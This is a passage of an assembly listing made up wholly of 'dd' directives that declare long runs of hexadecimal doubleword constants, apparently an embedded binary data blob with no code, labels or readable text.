dd 676862FEh, 6B6C6A92h, 71346EFFh, 0E26D4E0Bh, 76E1F176h
dd 0CCBFED8Ah, 0BF65B879h, 0FF1FFF81h, 0C36BC471h, 0C7FFC8C5h
dd 27E8CE8Dh, 0FFCF45CAh, 0BC34CF48h, 0D8D5D6D4h, 0F59B10FFh
dd 9EC6D738h, 0A29FFFA0h, 823FA51Dh, 0AAFF56A1h, 0D330AA55h
dd 0FFB0ADABh, 50B62AAFh, 0BAA0B28Fh, 0A486FBFFh, 0DD5DDEFBh
dd 0D602F0A7h, 0FFDF10DAh, 69CB09AFh, 0E0CFFB4h, 1361100Dh
dd 0FFF702Dh, 2180553h, 0FFEE60DCh, 0E0DD1703h, 0E2A907DFh
dd 0C0EFF6Fh, 0E9EAF4E9h, 0FB6FED13h, 0FFB3F117h, 0B7F5DBD1h
dd 6DFA6ED5h, 7C1BFAFFh, 40E83DEDh, 0C8FF0B42h, 0A46147FFh
dd 0CF4BF143h, 4EF6C3C3h, 57857FF4h, 0D249B20Fh, 5AD1FF5Ah
dd 0D01DCDACh, 49FF9B1Dh, 4DF5A723h, 0FFE6B028h, 2B2951C3h
dd 36C72D2Eh, 280DEEFFh, 8F6A351Eh, 3A22FFAAh, 6E7E7B7Ch
dd 0DEFF3B83h, 9852B35h, 0FF892F81h, 8D33780Dh, 91370ED7h
dd 7BD578FEh, 22403396h, 49A5222Dh, 0A8F857Fh, 631E6ADBh
dd 5C66FF8Ch, 6B915E5Bh, 0E4FF46C6h, 1870E370h, 0FFEE73EBh
dd 67B5A573h, 80BE647Ah, 6BFE1EFCh, 6FC26ABFh, 0CB38C6FFh
dd 0BD2683F4h, 0CEB2BF46h, 4CD1490Bh, 0BD4BD1FFh, 0C23799D7h
dd 9B9CFFDAh, 3BA1439Eh, 0FF1B9D7Eh, 1A93FFC1h, 0ACA9A7CFh
dd 0B4FF60ABh, 0F2A68B6Ch, 0FF9DB3A3h, 0C73C8FB8h, 5EC0FEA4h
dd 0FFFDA5FFh, 8100102h, 461FF22h, 0EB10CB2h, 0D2FF10B6h
dd 110FB770h, 0FF611314h, 1673341Ah, 0AA041C96h, 9FF19B7h
dd 0F067FFE3h, 0E897E898h, 0EEFF1420h, 0EF18B498h, 0C6392228h
dd 0FFFFF4DCh, 953B30F8h, 0FFE5F7D8h, 0E99F013Fh, 0BEB7AD43h
dd 48BD48FFh, 0C24BF453h, 0F80EFF3Eh, 54515250h, 71FF57B8h
dd 1B4153B4h, 0FF46A49Fh, 221F201Eh, 2DF270Dh, 2AD859FCh
dd 0BC3E2AD7h, 0BAC70B42h, 63172452h, 3AFF3738h, 1AD77D61h
dd 0FF82B639h, 0FBB682B5h, 0E385FE85h, 0FD8CFEFFh, 93A9F48Ch
dd 3537DB8Fh, 3FF96F4h, 54970697h, 85E95E83h, 8DD2A947h
dd 0AE32FF61h, 5FF1234Ch, 6460826Fh, 0BDBEFFBCh, 0DDC376C0h
dd 6DFFBF20h, 71B24BC7h, 0FF9688CCh, 0CFCD7575h, 0D807D1D2h
dd 0D431F2FFh, 47209CC2h, 4A9DFF47h, 0A2CA369Dh, 0A6FFA3A4h
dd 8643A93Bh, 1BACD4A5h, 1EFBB0FFh, 0A7906DB5h, 0D7E37FFFh
dd 0FBABFAE9h, 0C1FFA5FFh, 402AA5Fh, 6806FF03h, 0FD66C30Bh
dd 0EFFFE49h, 66B8A28Ah, 0C30A0706h, 7FFF0253h, 0E0061871h
dd 0FF0A4364h, 0EC4A6E4h, 120528E8h, 3970ECFFh, 0FBAEED16h
dd 77FF1BB1h, 0F6DE0EFFh, 16FAF7F8h, 0DAB7FC3Fh, 2D41E7F1h
dd 0FF44755Bh, 9E484546h, 3FA8054Dh, 0D2CFFF08h, 5A58FF40h
dd 1F611C59h, 1BFFFC79h, 0D4672449h, 0B72A50BAh, 0B22ECFAEh
dd 1C6E87F6h, 0F5FFFF2Fh, 0F9371D13h, 9BFFB917h, 0A1237BCCh
dd 0FF827F7Ch, 821E29D9h, 89B98885h, 6E89FCFAh, 0FF5F8E36h
dd 0AF954B92h, 7F91F2FFh, 0E9E6F99h, 5E0DF85Eh, 0DF5F875Eh
dd 6C9263FFh, 5E43FB24h, 0FF6B95AAh, 2F778A1Fh, 6069E052h
dd 0BC0FDF78h, 0FF39C153h, 0C469731Ch, 70A8B2D7h, 0BD9FC7FFh
dd 0CECC74F6h, 0FFD0FFCDh, 0C7308DD5h, 4BFFD84Ch, 9BC486D8h
dd 0FF946567h, 0A1A2A0C8h, 41A7B6A4h, 0D2A384F0h, 0AEFFBFAAh
dd 8E6BB34Eh, 0B59BA5FFh, 0BA2C9577h, 67BAFF2Bh, 0FDFBA3h
dd 8FF68FFh, 0B0BA5FC0h, 0FF6ACC0Ah, 6ED00EB4h, 126F3090h
dd 169FBAFFh, 97DB1516h, 0DC19FF52h, 0DD7E03DBh, 0CFFE2DFh
dd 10626AE6h, 0FF5A35EAh, 15EB192Ah, 82D826F0h, 0B9FCFF58h
dd 0F0D5B63Eh, 0D544EAFFh, 43B7EB2Eh, 0FF7C47FFh, 42A70850h
dd 0B21452F8h, 0DA563CFEh, 57553D5Ah, 1A22D05Fh, 4A54FFB9h
dd 4E04E624h, 8FFEA28h, 2C29274Fh, 0FF34CE2Bh, 1C260BECh
dd 2016F836h, 0AA9E37FFh, 7E7C244Bh, 280FF7Dh, 7FE09D83h
dd 49FF872Dh, 8C7BC7E7h, 0FC114E96h, 888C5835h, 0FF0DD687h
dd 5C08FFB5h, 85415C07h, 62FE5F5Dh, 226A7A61h, 2175C41h
dd 93ED85CDh, 89FF6D6Bh, 4F7A9DB4h, 0D416606Ah, 5DFF37DAh
dd 0BD65D601h, 12C1FFFFh, 0C421E2C8h, 8ECCFF72h, 68CD762Ch
dd 79FF93DAh, 4A2248D3h, 0FCD849D8h, 509B4D32h, 0FF0B799Bh
dd 0CBB6FF25h, 0CFCC16A5h, 0C6D2D3AAh, 973DFFCCh, 7C2A70B8h
dd 4B7EFF5Ch, 1DCFFF08h, 158F80Eh, 5F0090ADh, 0DFD4C0Ah
dd 1200FF4Dh, 90130252h
dd 18FE8F18h, 62DE041Bh, 0FFEF05B3h, 82E852E1h, 93E4C1FFh
dd 0D6E996E9h, 0FFEEAD16h, 0F575F2FFh, 64F1D28Fh, 0FA63EDFAh
dd 68C0FF0Fh, 7FFF8FE5h, 0A3FF644Ah, 4B3B8A46h, 0FF79507Ah
dd 51F9FF50h, 0BE555653h, 0B5161EFFh, 0E2204650h, 0A8FF6F00h
dd 54F96441h, 2A285025h, 0C92F267Eh, 0FFB12B0Ch, 0C82F499Fh
dd 0F260EFDh, 2F383534h, 0C5E547FFh, 348A38FFh, 3847768Eh
dd 9563FF8Fh, 0D960E32h, 7FE9BE96h, 7FF49997h, 3BFC62F9h
dd 61C6895Eh, 90FFFF63h, 6045266Eh, 79FF7096h, 716F976Ah
dd 0F8DD7374h, 7653147Ah, 6F60B461h, 0DEC4AEFFh, 0FFC01DD6h
dd 88D0BB3Fh, 0FF02C227h, 3AD0F7FFh, 8ADDD6BBh, 0D9517DFFh
dd 0C5C9D954h, 6B23CB9Fh, 0D0741B9Fh, 4959A7FEh, 6FADD338h
dd 73B161B7h, 0F35B91FDh, 2FAE0F9Bh, 0A43C640Ah, 0B3B15EF8h
dd 0D943FB6h, 0FF9AFF0Bh, 9B34863h, 0B80EB749h, 329612E6h
dd 1A0089FFh, 190161FDh, 0DDDEFFDBh, 0BD7EE419h, 0E3FF0BE0h
dd 0BFE7E8E5h, 0A5C7A8F0h, 29EBFFE2h, 7FFFAB19h, 0FA721379h
dd 0FBF1FA71h, 0BF3DEC7Ch, 0EBBEC5FFh, 3DFFC945h, 494A48F0h
dd 0FF4F5F4Ch, 0F94BAC69h, 5546854h, 99C9FF08h, 0A6C9A8FFh
dd 501BADA0h, 0A21CDD6h, 0F176FF81h, 0BB3FFF0Fh, 3516D339h
dd 1FFFF02h, 0AD82AE25h, 2BC62E82h, 87FFFF83h, 0E7A88E14h
dd 92FE388Ah, 967C800Fh, 0FF0D7C1Ah, 0B84AC0C0h, 46F493FFh
dd 8F7E87FFh, 0FF056967h, 0C7246FFh, 71996E4Bh, 7576FF73h
dd 5516BC49h, 0BBA56378h, 52BFFCFFh, 0C21FE0C6h, 5F1FFF6Fh
dd 3A392336h, 9E0AFFDCh, 52FFB68Ch, 59A651A6h, 6EACD2FAh
dd 0FB5F478Ch, 0ABDED860h, 0F3AAA7FFh, 0A5F8B8A7h, 0FEA3FFB9h
dd 0AA090545h, 0EFFF9B01h, 0A207ADEFh, 0FC0BB16Eh, 0EB65F8Fh
dd 775B0F10h, 72CFFF17h, 911A9209h, 3C0151Ah, 17FFDFDBh
dd 1ABFA0E8h, 0FF6EFF1Bh, 0EBE91114h, 0F4CBEDEEh, 0F0CD8EFFh
dd 0F56EF56Bh, 3C66F0FBh, 0FEB83C65h, 0FF173F3Dh, 2FF4AFAh
dd 4CF23CA1h, 0F0F6AC0Eh, 0C093714Dh, 583DFF7Fh, 0FF924262h
dd 1E1B5941h, 0E324941Dh, 0FF20FDBEh, 952FAEFFh, 85212220h
dd 32FFF455h, 0F23AA831h, 0C01F2C11h, 0FFBF3937h, 0DB9C827Bh
dd 862CFF7Eh, 8A300E13h, 0CAFFEA4Ch, 90358B39h, 6FB9C871h
dd 7DF658FFh, 9A9795FDh, 0B606399h, 8AFF5C6Ah, 0DB7B3164h
dd 0FF65DE65h, 6C98A7EAh, 75386D96h, 729A33E1h, 58766BFFh
dd 7556137Fh, 0FFE7BEE8h, 0C1F5E2BEh, 6EC8C1F8h, 0FFFFC685h
dd 87CFA5CAh, 0D078C12Ah, 0FFD4FF5Bh, 3491D93Fh, 0F29BC1CBh
dd 19FF4383h, 0A752FE6Ch, 0B79D7FCFh, 0F0B2D80Ah, 0A1F29274h
dd 0DFB7FF2Fh, 0FCA1FF74h, 379B0210h, 0FFFF3AFFh, 604ACE7h
dd 0F6660805h, 768250Bh, 0FFB933FFh, 13E619FFh, 2FDEDC04h
dd 0F07DE38Ah, 0E60EDFC0h, 57EAFFBFh, 0FFCA87EDh, 0F2F018E9h
dd 0F9E8F4F1h, 0EBD4B1FFh, 0F9643CE1h, 3FE8FEA3h, 0BEAAB38Ah
dd 0B77A0D46h, 18D0FFF6h, 9CC54C2Fh, 0FFC6FF0Bh, 5A40A176h
dd 1E44BADCh, 46FEE0FFh, 5855542Bh, 0BF26E94Bh, 2F39FF54h
dd 2040BA3Fh, 1A3CC53Ah, 0F394FFB9h, 0FF132B76h, 0B5E648FFh
dd 87B887h, 0E08E33F8h, 0FF911669h, 5B13599Fh, 8D5B16F8h
dd 0FF5F6088h, 1670464h, 916344EAh, 483A65DFh, 96F86F98h
dd 745C840Bh, 6E78FF5Eh, 6F2AB6BDh, 69F6FF27h, 0FFC347C3h
dd 0D54C2232h, 0AB8BF7F8h, 73797C8Bh, 0F055F4C1h, 9B565ECAh
dd 8E40F01Ch, 4EFF5551h, 23C928F2h, 50CF2C14h, 6131D141h
dd 8F7DAA03h, 0FF603EBh, 8A63B400h, 882500AEh, 0EAC49656h
dd 447C402Ah, 12F9D00Bh, 1B07C5FCh, 0EB80E8BDh, 0EAFF5505h
dd 0ED100C00h, 0FF080707h, 68868A09h, 0E3CE0A29h, 10F911FFh
dd 0FCE9DE12h, 4216FF1Ah, 3ED01EF0h, 2EA922F4h, 9A277F63h
dd 2A5E5CB8h, 0B82A5DFFh, 302F2FC5h, 0FFBC0631h, 0DCCA1170h
dd 0FF1D363Ah, 3F483F4Fh, 42B381A0h, 8846A8F8h, 0F4DFAC66h
dd 4D4DA36Ah, 8A4F4EFFh, 0A87716DEh, 0A54FFBEh, 9658B21Dh
dd 5FFFB57Ch, 4361605Fh, 0FF4120ECh, 69698F9Ah, 0E0326B6Ah
dd 744B0AFFh, 785726FAh, 7874FF9Eh, 47907C4h, 96FF2F7Dh
dd 8281807Eh, 0FDC10B57h, 8B637BA2h, 2E0B8089h, 908FE88Eh
dd 0B0F2DC41h, 55456F91h, 99FF71B9h, 9D75BD51h, 0A149903Dh
dd 0DE7FEBA1h, 36A8D1A4h, 96AFFF40h, 0B05834F8h, 0B483B3B2h
dd 9CF37F3Dh, 0BCBA5245h, 42BEBDFDh, 4BE6A54Dh, 0B9FFC6CAh
dd 0C82260C6h, 0FF25EC06h, 0D1D0CFCFh, 0F1B05EB4h, 0DBFF3352h
dd 37C5DBA6h, 35AD71DFh, 898CF501h, 42F24B3h, 0F09DEB03h
dd 6BEE0738h, 0F11A752Fh, 0B2D9FF55h, 11F80337h, 0FCFEFBFBh
dd 447068FDh, 516FE25h, 0FC392505h, 2F6E84C4h, 190BCC08h
dd 4712836Ch, 156BC77Fh, 0F80C1968h, 54019F1h, 2106B7F6h
dd 0A908FF22h, 0C3230241h, 7FFEC2Bh, 0EE2ED9EDh, 0F74231C3h
dd 0B5344530h, 0D3987FFFh, 3F3E3D3Dh, 26CCFF02h, 44AE4067h
dd 0A1FF688Ah, 4D4C4B4Bh, 0F614C085h, 2EDEAE75h, 5454FFB8h
dd 5DB398EBh, 0A05E835Dh, 4706EC7Fh, 0F5658E60h, 81179643h
dd 859B272Fh, 8A70FF6Ch, 0B8769857h, 7AFF9C56h, 7F908293h
dd 0FF15E1C8h, 0D221826Bh, 87876DA2h, 4D8988FDh, 2FA9E806h
dd 629E9233h, 0FF4678A5h, 0E89BE7B6h, 695DDA9Bh, 497280Ah
dd 0A6FB4882h, 5F668668h, 36A97F84h, 62AC450Ah, 3243CAFFh
dd 0B7B60D76h, 0B852FAB8h, 0DEC3A721h, 0B8AFC145h, 76C449B7h
dd 0C93806FFh, 0ED01C921h, 4638AD0Fh, 46D3D3C6h, 9C58E5FFh
dd 0DFA126FDh, 18DFA6FFh, 0E299E29Ah, 0E40EFF9Ch, 0EB01C82Ah
dd 0EDFFECEBh, 0D5946280h, 0FDF718F6h, 1045C012h, 0FFBFFAF8h
dd 24BB71CFh, 0F0C3FFFDh, 1C05EE04h, 0E1F4D845h, 6F2DC109h
dd 1211102Eh, 52A787ADh, 1BF3FFE3h, 1FF719F2h, 0C83FD2D3h
dd 2423FFFBh, 0C43AB32h, 69A1FF2Dh, 0C72F2124h, 32FF3131h
dd 72BABA33h, 0FFD1C413h, 3D3C3B3Bh, 6524B2A7h, 47A846FFh
dd 34A8A95Ch, 4A37FF4Ah, 4F4FA5A4h, 22FE5150h, 0AA7110DCh
dd 5FA059BFh, 1AD23BD4h, 8A9CFF7Bh, 67806961h, 6885668Eh
dd 0E321FFFFh, 0B1934A29h, 9B8B7282h, 77767FECh, 5F3EF6EBh
dd 7D0780FFh, 69DC8104h, 198BF681h, 0FFFF866Eh, 0E901A38Ah
dd 0FF7B8BAAh, 7CB35F93h, 98979694h, 0FF17A7F8h, 0FF5C99B8h
dd 0ADBF816Dh, 0A8A64EE2h, 5B05A98Bh, 0ABF88AE1h, 0B2C9B2CAh
dd 4952D55Fh, 86FFB31h, 0FFBFCEBFh, 0C2C0281Ch, 4BFFC4C3h
dd 0CDECA3EDh, 8055FF1Dh, 0D0A3CCBCh, 0D5FF3BD4h, 2CD7D6D5h
dd 0FDFF9E56h, 0DF2B1C20h, 44BE008h, 693CFEE4h, 215CCA3h
dd 0EEFFDFEAh, 0FAB57FF7h, 0F61F0FD6h, 12E65F69h, 0FF0363F9h
dd 0FE1688h, 8BB30201h, 0FB2241FFh, 0A750A76h, 0DE6FF38h
dd 0FA2EDBDBh, 15FF1412h, 7D958416h, 0FFF41F3Eh, 201F1E1Ch
dd 67AD40h, 25CDD9FFh, 285609E5h, 192CD851h, 0D21ACFFFh
dd 1CF638F0h, 603C2FD6h, 1AFF462Bh, 0C34947AFh, 0FF1C4BA3h
dd 4EBC8DFBh, 7BEF53A4h, 54BC03FCh, 2F585756h, 0A1781F68h
dd 0AD5DB5F1h, 35052841h, 0D9FF8CDBh, 0BF739BFFh, 77F49F53h
dd 2F90FB79h, 17C7B06h, 0A43BF1F6h, 49FFFF7Dh, 45856DA5h
dd 8AFF62A9h, 0EF8E8D8Ch, 89B6D51Fh, 5B7F416Fh, 0F59A73B7h
dd 754EFFEBh, 0A1A09F9Fh, 0C0FF2E21h, 0AA4CA281h, 0FF6A8A64h
dd 0A587AD5Eh, 937FB35Bh
dd 0FFB45CC3h, 0FFDDF746h, 0BD55B998h, 0F1B429CFh, 2CC4B3C0h
dd 0CAC99F2Fh, 40C6FFCBh, 3AD4EBAAh, 22FF53D0h, 36D8D43Eh
dd 0FA72D832h, 27DC36ECh, 0AD0595FEh, 68A9BCFFh, 3167BD2h
dd 0EF70FFEDh, 0D7A42FE8h, 0F7FF1DF0h, 0E7F9F8F7h, 0EDD99876h
dd 0FF0117FAh, 881403FFh, 0E20C2362h, 0D513E109h, 391FFF38h
dd 9732519Bh, 6394A8EBh, 0DD6FB8FFh, 0FF502100h, 57285F24h
dd 0EE02EC0h, 0C2F01CFFh, 35C6F299h, 38C0FFF7h, 0B47039D2h
dd 3CF4D5A8h, 0B9F6F69Ah, 72699FFFh, 5B335646h, 2C552FF0h
dd 5AB2082Fh, 0A6FF1B5Ch, 1D25EFDAh, 8DE90126h, 7EFF6880h
dd 0BE34A6Ch, 70661754h, 0BA74FF0Dh, 7B0C7B03h, 46429411h
dd 7F807FFFh, 79A0C70Dh, 8861FF7Fh, 0FFC2C6E0h, 7837B7FFh
dd 0FFBA5297h, 9A98707Ah, 0F0219C9Bh, 0A584FB13h, 8569FFBFh
dd 5B58ED2Fh, 80C6CD66h, 90FAFE46h, 37FBB15Ah, 0D2B55D10h
dd 3FFFCCA7h, 0E6854F25h, 0C9951B3Fh, 0CB23E0FFh, 0CEB414C5h
dd 74CEC6B7h, 0FF0233FFh, 0D828DE30h, 0BE1E137h, 6AF121FFh
dd 8C14C3A2h, 0F68F3AFFh, 1CFF1214h, 10DA34FAh, 812351FFh
dd 0D78263Fh, 4635EC7Eh, 85D1FF6Fh, 0F128D84Fh, 0FD1EC9FFh
dd 57953278h, 0ECFF6FE6h, 26FFC802h, 2ACC06E8h, 0FFC00AE4h
dd 85FCD62Fh, 13FF33DBh, 3634DCFFh, 0B74D3837h, 3918DB5Fh
dd 74CB49FFh, 73FF91ABh, 4A4949AFh, 0EAC2604Bh, 5FAC6B0Ah
dd 2B3C5C31h, 5928FF55h, 5CAD9BC8h, 50FF5CB6h, 6C608AD7h
dd 8D651B29h, 81FF7118h, 0A3F08068h, 0FF7E7284h, 0D1779829h
dd 88B934EDh, 7E907AFEh, 71FF9372h, 0C9D2BD25h, 0DF3FFF70h
dd 72A9C804h, 682D4E83h, 6FFBD053h, 727A9D5Fh, 0BC5698FFh
dd 80529C76h, 0A351FF60h, 4CA65065h, 0B9FF8AABh, 0A1AF47D2h
dd 0F8B25BCCh, 5E3276DDh, 78955FB4h, 5654BB49h, 0C0BFFF46h
dd 0E0A74F27h, 3307EBC1h, 0C72FFC8h, 0FB4C3357h, 1089DA3Ch
dd 0FE1072FFh, 8268053Fh, 0B6FCECC3h, 51584229h, 2AF10E68h
dd 0A9F1DFE8h, 0D51D855Dh, 4522074Dh, 226249D9h, 2BB1C68Eh
dd 0EA0C900Eh, 0A23C2DDFh, 41DCB1E9h, 49A26766h, 846E80C7h
dd 83E1BAA2h, 80FB06B5h, 0DCBE6DC3h, 6217591Eh, 668331FAh
dd 2AE526C5h, 6A8AB341h, 2AA3F9BAh, 3DE4866Bh, 0D8C00890h
dd 0A5684F34h, 0A11472C7h, 0A1467B65h, 23263A8Ch, 2AF77FC6h
dd 0B758FFAh, 6B580F4Ch, 4C303BFEh, 98E2FF01h, 1BC0EDCh
dd 6D70044Fh, 0BB117608h, 988A83A5h, 101C03Dh, 408AAF86h
dd 0B44B459Ah, 276254D7h, 52F24E2Ah, 1DF21002h, 0DB405CD2h
dd 0D1F2C1BFh, 7F261E39h, 59EFA0C3h, 0A8BFC350h, 2A6B373Bh
dd 91080152h, 0D2524F31h, 5483321Dh, 0FF0D63EFh, 2DABDB20h
dd 0EBCBD844h, 30BFC812h, 1F4CF477h, 214AC112h, 2BBF2517h
dd 0C1B3E0B7h, 0D5B665F3h, 0FC200923h, 1429D21Bh, 0CFF75524h
dd 0AFD94118h, 0E1C3EAE6h, 5B00C306h, 42BAD7D6h, 6B12DB08h
dd 8AB70DDBh, 64CDB156h, 981D99Dh, 6F6C0F2Ah, 1C714F34h
dd 0C800B135h, 0B72DA4AEh, 0E566DF48h, 9E2B632Fh, 0B1AC4D67h
dd 0C2A00DE5h, 0A0B7DF13h, 14FE203h, 7E086C58h, 0CC8ADB93h
dd 177C08DDh, 185AD701h, 41E18704h, 0EFB03B2Eh, 0E5F51ADEh
dd 7AC0A0E0h, 65D0F74h, 0DF04282Dh, 8D0B3260h, 0BE462524h
dd 0C7A0D740h, 7537546Ch, 639FF607h, 16FF1EDDh, 0E6695ED6h
dd 1E15483Eh, 1ADED94Ch, 12A9421Fh, 4076835h, 0FFB506C3h
dd 22896408h, 920CD88Dh, 697CD91Ch, 7A260136h, 0C62B0810h
dd 0D9AD0307h, 36446BB9h, 0D0781D8Bh, 835FFADBh, 3BDCD01h
dd 8DCC89CBh, 27212A1Ah, 0D8D462C7h, 0A4D9138Dh, 0E5743656h
dd 9685E7Ah, 0F12B172Ch, 0BE06EBB8h, 0C3F1F7D8h, 0D09231C7h
dd 0D648271Dh, 0DB7511AAh, 0EE037F0Fh, 0A22B0BB1h, 96CE3005h
dd 0EBBAF770h, 0E65F203Ah, 234143C6h, 6144851Ah, 0C65CC2B3h
dd 33015C7Dh, 41578810h, 6469F85Bh, 7B5A028Fh, 0E435EDC0h
dd 7E12E11Ch, 8C5F8009h, 860695D6h, 1056329h, 6523A7BBh
dd 827026FFh, 3EB4241h, 514358EEh, 0C488A50Ah, 0BF7E2023h
dd 0D064D961h, 0E1590113h, 662C6801h, 566A1D2Ah, 146A0FD0h
dd 5173CD9Dh, 5517169Dh, 0D38BF58Ah, 5920505h, 5F08468Ah
dd 90C257DEh, 75343BE7h, 0B011986h, 0F1181609h, 93853574h
dd 0F8A7FF59h, 4CA25DABh, 0D0681EFEh, 57EFF990h, 31FA830h
dd 59E86128h, 0D86AB369h, 0D80D2C02h, 0F0C66AB3h, 5AF97A29h
dd 481127Bh, 787B4BECh, 0DD7302h, 0C310F6E7h, 0B7D86D6Eh
dd 9C9DCE33h, 30E30D16h, 77499BACh, 0DBDB881Ch, 80900331h
dd 0EA6607E3h, 0EB95274h, 40250FE8h, 0B1762348h, 15A1F016h
dd 8022C4h, 3F60993h, 4570849h, 9F79FDF5h, 3B0CF802h, 3ED92E64h
dd 0A609F5B4h, 0DA042C2h, 259010D3h, 0CD180812h, 0E8500761h
dd 1BAC0374h, 0EFE83F2Ah, 0A2000Bh, 0F782CE32h, 0B0000E8h
dd 8260AE12h, 5D1105D5h, 0F7FFE3E8h, 1EAFFFFh, 0FF20E0A0h
dd 90806EEh, 4983660Ah, 0FBF32AFFh, 2471F512h, 1814FFFEh
dd 4D18F253h, 1DA96966h, 0DFC36AC3h, 0E7B82B67h, 0C228FFD1h
dd 0C60CE628h, 67FF5D2Ch, 343333D9h, 0FFB88135h, 0FAC61D7Ch
dd 3DD53DCBh, 8397F9FFh, 45AE44B6h, 989EFA93h, 374C4AA2h
dd 0EADF080Eh, 47AF7615h, 0FFD74C0Eh, 0B559783Fh, 6EF7D15Ch
dd 0BB6688D0h, 4D2CEC30h, 626E807Dh, 0E10E0B5Fh, 86B291EAh
dd 0C74E55Fh, 0E43C32Bh, 8305AE7Fh, 6FC383FAh, 0A74B87FFh
dd 8AF18AF2h, 8D66FE3Dh, 5355852Eh, 0B85A6C63h, 761E94BFh
dd 0A8FFD69Dh, 59A049F6h, 0EA6639DCh, 0DE42A95Bh, 94AEAD0Fh
dd 0B79672DDh, 87C80E48h, 5FC9BCEAh, 8C628ACh, 3A06FDE6h
dd 9F9D9DC9h, 0D5C80E08h, 0BBF1DBF6h, 0DEDCFDA7h, 0BF9EE0DFh
dd 0DE1C05Dh, 0C5ABEAE5h, 0FF5C190Eh, 36F60535h, 11FFF90Ch
dd 82A705F9h, 0FD007DFCh, 78077F83h, 0A81B4C07h, 0E754FF05h
dd 0FBD27D0Fh, 0E8FF1D13h, 166B1668h, 0E0196F76h, 3FAA1D6Ch
dd 0FFABBE0Eh, 5ADB0261h, 612A592Ah, 0AB1FFF6Fh, 33C1FFF0h
dd 0BF2A37DFh, 0C5EA7115h, 0ED1C3C4h, 43A9E8BFh, 0A1454443h
dd 6D7F8B40h, 324F35B6h, 0BB30FF4Fh, 0BFD3CC53h, 0FDFC5957h
dd 5CA65AB3h, 0C80E13A0h, 0E22A7F1Ch, 0EA8C4B2Ah, 0DC7387B0h
dd 8D57BB0Eh, 0A4741BA9h, 80F085FFh, 6C5A84F7h, 0E33FFD8Ah
dd 0F2828E60h, 0FF7B0E4Fh, 97969595h, 0BFFE141Ch, 7F0E98A3h
dd 0A349E690h, 0A5FFA4A3h, 8DCC2AB9h, 6FAE40AEh, 0CAB3D521h
dd 1D27596Dh, 52F4D20Eh, 6F0BB4B8h, 2AB3B030h, 11CCC0FFh
dd 0DF1DC42Eh, 0CBCBFF21h, 420ECDCCh, 0D6FFF5B4h, 0D8DAD638h
dd 0FFD9D93Fh, 52B1DBDAh, 201CFB9Ah, 0BFE310C0h, 3B8E97Ah
dd 7BFF28EAh, 42ED060Bh, 0FF1A7785h, 0F6F5F4F2h, 0DEBD7753h
dd 0FC1407FFh, 0A500FFFEh, 2047F18Dh, 732EEDF9h, 0ECA58F3Ch
dd 0CEE0F052h, 0EB0EB7E1h, 79F797EDh, 511EFEF0h, 28439F00h
dd 0CB0EA5DCh, 97ED903Fh, 9FA54653h, 0E03642CCh, 1FEC3641h
dd 0F0013D0Eh, 0B2839FC1h, 0E7F6FFDCh, 0DD898F6Ah, 5776DD35h
dd 0B0FFF2FFh, 5C5B5A58h, 0FF3BD370h, 628A6544h, 66666564h
dd 4E2DE7FFh, 616F8797h, 720AE37Bh, 0B46D0209h, 7A93FF85h
dd 9622D3EFh, 1BFF657Ch, 84838369h, 0FF089385h, 0E176ADCCh
dd 8CF6D786h, 9E90E9FFh, 97EC97EBh, 320E5646h, 0CC5F780Ah
dd 7CFA0E0Fh
dd 538AE923h, 7A9A0E97h, 7AFF2CB7h, 0B9C7FF98h, 7FC7BDC4h
dd 29FFC04Eh, 0C5C4C3C3h, 0FF8C4881h, 3E0A36EDh, 0DFCD25CDh
dd 0D0392FFCh, 8CF5F69Bh, 0E00AFF30h, 0FF0DB1B9h, 0E9E8E7E7h
dd 0C988669Ah, 0F204EAFFh, 6328EFEh, 0F51DFFF5h, 0E8FBD935h
dd 81E3FE82h, 7FFF87FEh, 0C7CCB8C2h, 0C8FF08F3h, 0CE40BF9h
dd 0FF100F0Eh, 30579D63h, 63146CE9h, 7F1118ABh, 1F1E1D1Dh
dd 46FFAC87h, 25552007h, 0FFC02956h, 0E02329C1h, 213F2DC5h
dd 0FF32DAC6h, 0B57536FEh, 373F1E5Dh, 0FC0B3DE1h, 638F43ABh
dd 0C12F46AFh, 0D448A2A1h, 0B5BAA689h, 0EB77082h, 0BDC6749Eh
dd 59FFFF57h, 7918D469h, 61FFB7A2h, 6A636261h, 0FF4322EAh
dd 64688294h, 9B15E66Fh, 9C0EDE01h, 35777674h, 58A3BF72h
dd 808BBF81h, 26816AFFh, 846DC160h, 1AEBC249h, 0FFE185DDh
dd 92919167h, 0D21A1C93h, 7164B3EDh, 9D9CFF2Ah, 85E41018h
dd 0A7FFD35Eh, 4373A7D4h, 0FF44A5ABh, 0ABD8AE47h, 0B3B3597Bh
dd 30B5B4FFh, 469DFC38h, 0FFBEFF50h, 2BC2544Bh, 0C5E22BB2h
dd 5BD0C6C5h, 0C8EF84B8h, 0ACA3FFC6h, 4C66F30Eh, 0E1121EFFh
dd 0E5E4E20Ah, 67E4E6FFh, 0BC17CEADh, 0EB84FFB9h, 0B5FDF31Bh
dd 3BFFF71Fh, 37FA13D7h, 0F83CE8EDh, 278FF0Fh, 4780B47Bh
dd 0E494CD0Eh, 8AED13FFh, 1917FF34h, 1A66F8D7h, 501D1A65h
dd 0C90B6FE1h, 24FE2323h, 4CAA5025h, 1D372E0Dh, 0C4FF56A2h
dd 4112FC32h, 0FC374637h, 4D3A4E3Dh, 0E13043Ah, 4C40AA7Fh
dd 3A453917h, 0A17D49F6h, 26FFA349h, 5251524Fh, 55A555BBh
dd 0D418FFFFh, 9C587F3Eh, 0A1E55FAAh, 6AC66296h, 833FFFBh
dd 0C709AFFh, 0A8759ECEh, 92DAD2FFh, 7E7D7C7Ah, 0A6994B57h
dd 0FF86161Bh, 6102399Eh, 8D8C8B8Bh, 0FFF4684Bh, 977896B5h
dd 734A8F31h, 93629AF0h, 310E0C17h, 2810F8FFh, 5F568DECh
dd 4797A21Dh, 0B2B1FFB1h, 0F23A39B3h, 0C5F64493h, 8FBDC6B9h
dd 0FF96BEC2h, 814B73C2h, 0FFB43BE2h, 2ECAB7CAh, 0D2C0CC26h
dd 0D13986FFh, 0D63EF519h, 1CFF0BD8h, 0FA9953FFh, 0E2132123h
dd 0CE7F108h, 0FFBC4238h, 0BCD2574Ah, 8D125785h, 0DE826DFCh
dd 0E6FEE6BEh, 0A505D28Ah, 50572FFh, 87D0472h, 0FECAE06Dh
dd 0C50E3E0Dh, 1A18F06Fh, 0F81CFF1Bh, 0DD045B91h, 0FF6F22CAh
dd 0FFA5A026h, 0C42F0E4Dh, 302F2E2Ch, 77BDBCFFh, 36DEC910h
dd 5A846F38h, 1AFA59B1h, 4240A83Bh, 0C998FF5Fh, 0B5F06C03h
